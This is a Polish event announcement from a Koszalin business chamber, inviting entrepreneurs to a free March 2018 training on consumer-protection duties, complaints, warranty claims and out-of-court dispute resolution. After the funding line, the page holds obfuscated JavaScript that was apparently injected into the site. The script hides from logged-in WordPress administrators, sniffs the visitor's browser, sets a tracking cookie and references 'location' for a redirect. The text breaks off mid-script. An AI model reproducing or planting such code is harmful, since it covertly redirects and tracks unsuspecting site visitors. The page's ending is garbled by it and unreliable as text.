Obowiązki przedsiębiorcy wobec konsumenta oraz alternatywne rozstrzyganie sporów konsumenckich | Północna Izba Gospodarcza w Koszalinie

Prawne Vademecum Przedsiębiorcy: Szkolenie „Obowiązki przedsiębiorcy wobec konsumenta oraz alternatywne rozstrzyganie sporów konsumenckich”, 22.03.2018″

Szanowni Państwo,
Centrum Biznesu Fundacji CIP w Koszalinie ma przyjemność zaprosić wszystkich zainteresowanych przedsiębiorców na kolejne spotkanie w ramach  cyklu Prawne Vademecum Przedsiębiorcy.
Celem spotkania jest zapoznanie uczestników z obowiązującymi przepisami dotyczącymi  ochrony opraw konsumenta i wynikających z nich obowiązków dla przedsiębiorców. Mówić będziemy o praktycznych aspektach tego zagadnienia, m.in.
•       Procedura reklamacyjna
•       Roszczenia konsumenta z tytułu rękojmi
•       Pozasądowe rozstrzyganie sporów
•       Kompetencje Rzecznika Konsumentów

Szkolenie poprowadzi Krystyna Piwońska Miejski Rzecznik  Konsumentów w Koszalinie. Arbiter w Sądzie Polubownym przy Inspekcji Handlowej.

Na spotkanie zapraszamy w czwartek 22 marca 2018,  w godz.10.00 – 12.00 do City Box, Rynek Staromiejski 14 Koszalin.
Udział w spotkaniu jest bezpłatny tylko po uprzednim potwierdzeniu uczestnictwa.  Liczba miejsc ograniczona, decyduje kolejność zgłoszeń.
Zgłoszenia można przesyłać mailowo na adres m.skrzypek@biznes.koszalin.pl   do 20 marca 2018.
Formularz zgłoszeniowy w załaczeniu.

Szczegółowe informacje na temat spotkania można uzyskać pod numerem telefonu: 94/3412317 lub 94/3471317 oraz na stronie internetowej www.biznes.koszalin.pl lub w biurze Centrum Biznesu, ul. Zwycięstwa 42 w Koszalinie, pokój 110

Zadanie dofinansowane z budżetu Gminy Miasta Koszalina 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m